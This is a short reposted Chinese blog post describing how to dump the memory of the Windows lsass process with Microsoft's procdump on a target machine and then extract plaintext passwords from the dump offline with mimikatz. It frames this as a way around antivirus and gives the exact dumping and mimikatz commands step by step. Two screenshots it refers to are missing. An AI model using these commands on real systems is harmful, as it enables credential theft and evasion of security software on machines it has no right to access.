mimikatz如何读取procdump的内容dump文件获得明文密码

Jumbo

转载备份

众所周知mimikatz可以直接抓到存放在lsass进程中的明文密码，但是很多情况下有杀软这种瘟神挡道，我们必须另想办法。

procdump是微软官方提供的一个小工具，在微软官方有下载

下载地址

将工具拷贝到目标机器上执行如下命令（需要管理员权限）

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

获得一个lsass进程的内存dump文件lsass.dmp，下面我就们就要用mimikatz（注意是alpha版的mimikatz，否则没有这个命令可用）获得dump文件的明文密码了。

但要注意dump文件和mimikatz的版本对应关系，对应关系如图：

将这个内存dump文件拷贝到mimikatz同目录下，双击打开mimikatz执行情况如图：

1. mimikatz # sekurlsa::minidump lsass.dmp
   
2. Switch to MINIDUMP
   
3. mimikatz # sekurlsa::logonPasswords full

复制代码

大功告成，菜鸟言论，仅供娱乐。